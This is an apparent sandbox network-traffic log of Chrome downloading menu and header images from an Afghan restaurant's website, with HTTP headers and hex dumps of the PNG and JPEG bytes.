                                                                                                                                                    2024-10-01 04:26:45 UTC6563INData Raw: 13 3f 7d 17 ca c1 d7 b0 7a b9 8b f9 e4 7f a6 ff 32 13 3b 1a 26 15 cc a3 9a 25 32 a5 3c 7a 2a 87 23 de 8c 50 93 8c 94 72 00 5c ba b8 f2 ef 0c 4d 41 93 05 c5 e1 09 3a 6b 67 06 a9 85 2c 91 cc 15 71 dc 80 b5 17 9e fb 43 15 c0 4a e5 f1 dd fe ba eb f4 9b 9a 4e de 17 62 10 b4 55 0d 55 91 51 e4 41 2c 51 65 b6 97 21 80 12 cb 44 8a 82 1c aa 28 91 46 1c 87 c4 71 4c e4 bb 48 22 82 58 20 a4 78 e0 d5 84 34 a8 e3 c4 db 3c 9b 81 55 c5 22 84 28 26 99 b4 e8 db 1e 61 0c 99 ac 42 5f 51 b0 fb 3d e2 30 c6 48 58 4c e5 a6 d8 5a 0a 69 d9 31 a5 82 45 25 63 91 1a 1e 61 61 fe 22 1b eb 8b 28 9a c9 96 0d 97 ba 31 6a 22 66 3c 11 b1 77 2a c3 de 71 95 d2 e4 24 6e 75 1e 27 b3 1f 5b ca b1 be b2 85 9f 3e 43 3b 57 63 e7 1d ef 60 f9 33 7f 8e d3 58 23 24 cd 78 c6 e7 ca 3b 86 a8 ad 06 5c fa 77
                                                                                                                                                    Data Ascii: ?}z2;&%2<z*#Pr\MA:kg,qCJNbUUQA,Qe!D(FqLH"X x4<U"(&aB_Q=0HXLZi1E%caa"(1j"f<w*q$nu'[>C;Wc`3X#$x;\w


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    60192.168.2.449824162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:45 UTC668OUTGET /assets/imgs/menu_imges/Afghani_Rice_Mix_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:45 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:45 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:11:34 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39909
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:45 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 70 00 00 00 4b 08 06 00 00 00 a8 5d 03 25 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRpK]%pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:45 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:45 UTC7141INData Raw: 17 16 f0 6c e8 d3 60 26 10 67 e1 94 be 9e a9 67 0e 70 e3 ce 71 76 de 7c 35 2b 8f 7c 91 f6 95 47 d9 17 f9 4c f4 40 6d 68 2b e9 c6 69 2e 9f 84 bb 45 93 97 bc 13 be 7b 6c 80 df fc db 45 3e b8 0d ca 57 2f b3 2e 3c ca 81 ea 6e 1e f8 c0 cf b3 a1 b2 c0 ad eb 2e c3 96 5b 68 6e 79 39 99 94 8b 0e da 5d a3 4e 12 60 21 a9 47 31 f9 ac bb eb ff d9 68 ae bb 95 a2 93 4a 23 cc 34 12 13 c3 48 d0 5a e3 66 b2 98 08 0c d3 ea f2 90 b6 8d 9b ca 20 94 01 d2 c2 4d a5 11 96 c6 d6 06 b6 96 e8 44 63 5a 0e c2 90 44 7e 8c 36 4c b2 c5 0c c5 42 96 4e db c3 30 6d 52 a9 34 52 0a 0c 5b 90 04 12 41 a8 83 85 79 6d c5 06 a3 7d 26 95 bc 22 48 a0 13 80 19 af dd 68 ff 55 22 a6 a4 44 08 8b ea d2 1c 7b 6e bd 85 bd fb 6e e6 f4 a1 c7 29 94 fb 30 e3 b0 1e f9 5e 58 b4 2c 37 d4 9a 94 09 8e 63 f1 d0 67
                                                                                                                                                    Data Ascii: l`&ggpqv|5+|GL@mh+i.E{lE>W/.<n.[hny9]N`!G1hJ#4HZf MDcZD~6LBN0mR4R[Aym}&"HhU"D{nn)0^X,7cg


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    61192.168.2.449826162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:45 UTC659OUTGET /assets/imgs/menu_imges/Kabuli_Pallow.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:46 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:45 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 19:28:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 44675
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:45 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:46 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8d 00 00 00 4b 08 06 00 00 00 4d ef 04 0c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRKMpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:46 UTC16384INData Raw: 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:46 UTC11907INData Raw: b0 52 63 74 b2 c0 03 13 0e cf bf bc 8a 35 30 48 78 66 9e 0e f7 0c 86 5d a2 67 c3 00 97 ee e9 61 be e2 30 65 66 d8 f5 b6 37 11 5d bf 87 e7 1e 7a 91 87 be b1 82 74 eb 6c f9 e0 20 f9 88 ce ce 94 87 33 37 47 64 75 1a df cb 40 5d 00 49 64 66 0f 6c bc 81 85 97 1e e7 85 cf fc 29 65 36 f2 e0 e7 24 9f ff c5 fb a9 2a 1d 4c d4 f7 f1 f4 d7 66 39 b4 ba 1f cb 5f 62 f0 4d 5b 31 7a 07 91 b5 53 08 eb 34 b2 f1 5b a0 af 42 ea 2d 90 fd 4d f4 64 2f ba da 4f 30 5f 43 52 22 b0 eb 2d 2b 62 59 04 42 c5 b2 8c bd 9d 1d 19 91 8c 47 49 a5 62 e7 8f f3 a0 b1 e2 31 74 4b 27 d9 d6 d9 96 ed e8 59 2f 7e c4 d6 24 ab 33 34 57 96 51 13 49 9a 85 15 74 45 45 96 96 28 1c 39 42 7f 9f 45 ac 2d 89 b3 32 4f 57 18 21 de bd 81 c9 ce 5e 0a 9b e2 f4 7f fc 7d 1c 78 7e 94 81 9e 1d ac db 68 d0 18 fb 7b fa
                                                                                                                                                    Data Ascii: Rct50Hxf]ga0ef7]ztl 37Gdu@]Idfl)e6$*Lf9_bM[1zS4[B-Md/O0_CR"-+bYBGIb1tK'Y/~$34WQItEE(9BE-2OW!^}x~h{


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    62192.168.2.449827162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:45 UTC660OUTGET /assets/imgs/menu_imges/Biryani_Pallow.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:46 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:46 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:11:12 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 36530
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:46 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:46 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 4b 08 06 00 00 00 1b 15 2b 3f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRYK+?pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:46 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:46 UTC3762INData Raw: b5 5d e8 fe 20 96 bf 83 8c 13 26 21 ce 71 f8 e4 55 32 de 4e ba 13 12 fe a8 07 44 3f e7 8e 9f e3 e2 b4 49 b3 cf a1 2d 06 99 bc 48 47 c2 20 e8 85 3d bb 6e e6 9d 0f 3d 4a 6e ea 02 bd cb d6 30 33 6e d3 d6 bb 12 c5 db 81 9d fa 0e 8d eb 1f e0 fa 8d 0a 6f 3e 36 42 f3 a6 cd 44 c2 3e 6a 43 45 c6 46 2b b8 33 a7 59 d8 1b 60 d6 5a 88 2d c2 e4 f0 65 2e 1c ed 43 90 ca 1c 3e 02 f5 fa 2c 1d eb b7 52 d3 7b 2b 86 ab 60 94 8a f8 23 31 a2 cd 9d 94 0a 65 dc 50 13 f1 c5 db 51 64 8d d1 53 2f e1 8f 46 d8 b4 75 0f 37 26 cb f7 9f 3a 3b fc 94 ee 91 11 04 09 cb b2 11 a4 ff 33 c8 3f d0 e9 ec 7c 2e 74 88 d5 b7 33 31 dc 77 f0 c9 ff fd b1 0d 93 43 e7 f1 46 6a 91 fd 35 e0 82 6d 56 f1 fa 03 f8 22 71 42 89 16 82 91 28 01 af 40 a8 61 21 47 27 bd 8c d8 f5 0c 0f 4d f1 95 27 87 48 c4 6a 18 9b
                                                                                                                                                    Data Ascii: ] &!qU2ND?I-HG =n=Jn03no>6BD>jCEF+3Y`Z-e.C>,R{+`#1ePQdS/Fu7&:;3?|.t31wCFj5mV"qB(@a!G'M'Hj


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    63192.168.2.449829162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC654OUTGET /assets/imgs/header_5.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 390429
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16030INData Raw: ff d8 ff e1 1d bd 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0d 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 aa 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 b0 01 1b 00 05 00 00 00 01 00 00 00 b8 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 c0 01 32 00 02 00 00 00 14 00 00 00 e2 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 f8 00 00 01 54 00 08 00 08 00 08 00 2d c6 c0 00 00 27 10 00 2d c6 c0 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 32 32 3a 31 33 3a
                                                                                                                                                    Data Ascii: ExifMM*@,(1"2iT-'-'Adobe Photoshop CC 2015 (Windows)2022:07:26 22:13:
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 75 a1 b5 86 54 7d 46 b0 1b 0e fd c4 9d b1 ee f6 ec 6b ff 00 e0 bf 48 ba de 83 f5 8a 8e ad 6d b4 ec f4 ad a9 bb 9f 41 32 1e d0 76 5a e6 ff 00 c1 b1 df f5 7f a4 5e 4f 76 3d 8f b2 dc 8b ac 36 5a d7 02 ec 97 43 1b af 7f 5c fb 71 fe 97 e8 f6 57 fc b5 77 a6 e5 dd d2 b2 7a 6e 7f da a7 1f d7 2c 7d e0 16 59 e9 d6 f6 fa f6 39 9b 43 f2 99 7e e7 fe 8d fe 9d 96 d7 fc e2 50 9c c4 a3 2f 70 ca cf ae 3f a2 7c b8 be 5f f9 8a 96 3c 72 12 02 31 14 2a 3c 3b c2 51 fd ef de 77 33 3e ad 61 1c eb ab ca f5 32 6d c3 b1 f4 56 72 ac 7d ed 6d 43 f4 b8 a2 a6 dc e7 ed 63 b1 ad a5 4a be 91 8c d6 34 d7 15 06 36 36 34 6d 13 f9 c7 da b7 fe b2 52 da 7a a5 77 88 6b 33 69 d9 3d bd 4a 0c b4 cf fc 26 36 47 fe cb 2c d7 43 8c fd 13 c7 cd 37 34 65 c7 2b b9 0d c5 f6 28 c7 21 c2 28 01 f4 69 64 74 be
                                                                                                                                                    Data Ascii: uT}FkHmA2vZ^Ov=6ZC\qWwzn,}Y9C~P/p?|_<r1*<;Qw3>a2mVr}mCcJ4664mRzwk3i=J&6G,C74e+(!(idt
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 19 e2 de 36 e7 57 c9 89 0a c4 63 3e 35 fe 04 f1 37 f8 6b 53 07 e6 8e dd 36 6c 58 79 2c f8 d2 b2 e8 7c 77 8c 87 f7 0f 95 68 46 db b2 e3 6f 3b 9e e9 f5 57 89 61 9d 0a 4b 01 d1 a5 02 ab 69 6f 4b 23 57 1f dc 37 a3 8f d5 91 e5 e2 4c fb 88 c7 ca 5f 69 df 8b 48 a0 e9 d3 af cd 41 da 2e 44 00 5f 96 02 0b 3c 46 d3 ea 14 9e 58 40 90 c4 c4 b7 00 3b 40 f5 56 4b 79 fc dd d8 36 5c a6 db a5 69 66 9e 3b 06 f6 d6 e0 13 cf bf f2 d1 ce bb dc 86 d3 b0 e6 e5 19 4c 4e 62 b2 37 6a b3 77 63 ff 00 15 71 6d 97 66 b4 91 6d d1 61 c5 31 64 fa 89 a6 91 ec c5 7c 52 2e af 9a b6 65 c8 50 fd b3 5f 6d db 8c c4 d9 a0 37 9d 43 2f f3 23 6c 60 e9 85 ab 2b d9 4f 76 49 13 82 27 f0 e2 91 fd 4d e1 ac 6f ff 00 a5 be a2 dd 31 e5 dc 30 f6 85 68 31 c9 05 95 8b 14 3f cd 8e b0 d3 e7 e0 cd 9b 2a 6d c4 e2
                                                                                                                                                    Data Ascii: 6Wc>57kS6lXy,|whFo;WaKioK#W7L_iHA.D_<FX@;@VKy6\if;LNb7jwcqmfma1d|R.eP_m7C/#l`+OvI'Mo10h1?*m
                                                                                                                                                    2024-10-01 04:26:47 UTC15252INData Raw: 57 b0 f3 aa a6 56 96 45 d7 c1 48 e7 f1 ac ee 6f a6 b1 88 08 3a 6d 20 06 2c 8c 8f 75 5a c1 b8 7f a2 ad dd 10 f1 e3 55 8e 2a bc be e1 3a 10 72 02 ae e3 e8 91 74 e9 b5 cf 88 f6 fe 8a a4 b3 a6 82 5b d6 f3 dc 43 15 72 12 26 1c 4f c2 ab 49 8e b1 8d 51 0e 67 9f c6 89 ee 18 01 85 90 71 b7 01 d8 68 14 87 21 58 44 e0 81 e9 a3 cc a5 48 07 af 5f 96 0e 33 ee 03 c7 a7 d5 e5 9f ff d3 2d 0a 2c 11 98 e2 f8 f3 ab 48 09 5b 0e 37 a9 8e 34 77 ee 7f a2 bc 22 51 c0 70 26 b9 01 08 d0 ce b1 70 da ca d0 c0 b0 93 61 62 79 d4 e6 15 3f a4 d2 19 92 26 11 3f 13 da 7e 15 38 50 7c 26 f4 61 47 a7 c2 0b 31 f5 41 7b 8e 21 30 b0 1c 4f 96 d5 3e 02 34 50 24 52 b5 c8 e7 56 25 5b 25 c0 e3 55 d9 c3 0d 57 01 87 3a 5d 71 3a c6 06 e4 2a 4d 31 ef 6b 07 80 a7 89 03 20 b5 52 93 26 27 16 b8 04 76 1e 74
                                                                                                                                                    Data Ascii: WVEHo:m ,uZU*:rt[Cr&OIQgqh!XDH_3-,H[74w"Qp&paby?&?~8P|&aG1A{!0O>4P$RV%[%UW:]q:*M1k R&'vt
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: c6 d2 83 a6 cb aa dd ab 6a bb ff 00 9a e2 4c 2f 79 a3 90 cd 6f c4 20 70 50 3c d4 9b 0e d5 b8 75 b4 42 59 41 c3 db 15 8f ba ee 2d 24 aa 3b dd cf 4a d2 97 1e 7e e1 90 28 a1 8e 71 ff 00 fd 7e 44 46 6c e4 2a 9d 9b e6 86 7f 2d 70 df 6f d9 32 37 ec c4 d3 36 67 11 a8 f3 41 dd 8c ff 00 da 50 d3 b8 9f 6a 35 65 0b ec b3 37 03 72 c0 f9 5b ee d5 ad f7 7c 5d e5 57 0b 05 0c 58 78 c4 22 df 80 60 06 90 74 fa 6a b6 d1 b4 3e 5b b2 c2 09 93 b7 e1 6a e8 77 3d ca 62 51 83 16 aa 7c ca cb e7 f3 4e a7 6f db 96 e5 dc f7 3e 56 6d ef cb e5 95 b1 43 e6 82 70 d5 86 a6 e0 3f 4d 74 0e 9f e9 78 f6 d5 13 cc 35 4a 47 23 d9 57 76 6d 8e 2d a9 6e 40 32 5b 9f c2 8b 0e 1f a4 d3 7b 5e c4 83 ee e7 dc eb c7 e9 98 fb df ee 1c ff 00 83 83 ca 83 42 47 cd 14 f1 e7 d9 4b 6b 0b b7 6f 21 5e 24 45 c4 f3
                                                                                                                                                    Data Ascii: jL/yo pP<uBYA-$;J~(q~DFl*-po276gAPj5e7r[|]WXx"`tj>[jw=bQ|No>VmCp?Mtx5JG#Wvm-n@2[{^BGKko!^$E
